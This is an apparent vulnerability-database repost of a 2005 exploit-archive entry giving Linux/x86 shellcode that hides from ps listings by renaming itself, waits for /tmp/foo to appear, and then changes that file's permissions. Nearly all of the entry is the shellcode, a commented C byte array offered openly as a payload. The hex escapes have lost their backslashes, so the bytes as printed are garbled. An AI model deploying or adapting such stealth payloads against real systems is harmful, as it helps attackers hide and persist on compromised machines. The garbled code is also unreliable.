Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)
漏洞ID | 1055377 | 漏洞类型 | |
发布时间 | 2005-09-08 | 更新时间 | 2005-09-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*----------------------------------------------------------------------------*
* [Mystique Project: Examples of long-term payloads] *
* hide-wait-change code *
* by [email protected] & [email protected] *
*----------------------------------------------------------------------------*
* This code, upon execution, will perform the following things... *
* *
* 1) Fork a new process, and kill PPID via _exit() so we get inherrited *
* by init and now have a new PID. *
* 2) Will obtain the current location of argv[0] by retrieving information *
* from /proc/self/stat. *
* 3) Copy the name we wish to masquarade as into argv[0] in memory. *
* 4) Call setsid() to establish ourselfs as a process leader. *
* 5) Will sleep via nanosleep() for a givin interval of time. *
* 6) Will check to see if a file exist via access(). *
* 7) If it does not Loop back to step 5 *
* 8) If it does then we chmod() the file with permissions 0455. *
* 9) Calls _exit() *
* *
* * steps 3-4 effectivly hide us from most ps-listings *
* *
* size: 187 + strlen(new-proc-name) + strlen(file-to-change) *
*----------------------------------------------------------------------------*/
char shellcode[]=
"x6ax02x58xcdx80x85xc0x74x79x31xc0x40xcdx80x5bx8d"
"x73x10xfex43x0fx99x31xc9xb0x05xcdx80x93x6ax03x58"
"xb2xfax89xe1x29xd1xcdx80x89xcfx01xc7x93xfdx6ax20"
"x58x6ax0ex59x87xcbxf2xaex87xcbxe2xf8x47x47x31xc0"
"x6ax0ax5bxfcx31xd2x8ax0fx83xe9x30x01xc8x47x80x3f"
"x20x74x04xf7xe3xebxedx94x5fx5fx94x57xb1xffx31xc0"
"xf3xaax5fx56x4ex46x41x80x3exffx75xf9xfex06x5exf3"
"xa4xb0x42xcdx80x89xf7x92x48x89xc1xf2xaexfex47xff"
"xffxe7xe8x87xffxffxff"
"/proc/self/statxff" //
"xort and izik rocks the linux boxxff" // new proc name
"/tmp/fooxff" // file to chmod
"x6a" //
"x03" // sleep-time
"x40x89xe1x89xe3x34xa2xcdx80x31xc9x89xf3x34x21xcd"
"x80x85xc0x75xebxb0x0fx66xb9x6dx09xcdx80x40xcdx80";
// milw0rm.com [2005-09-08]
相关推荐: Mozilla document.open() Memory Corruption Denial of Service Vulnerability
Mozilla document.open() Memory Corruption Denial of Service Vulnerability 漏洞ID 1101525 漏洞类型 Boundary Condition Error 发布时间 2002-09-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666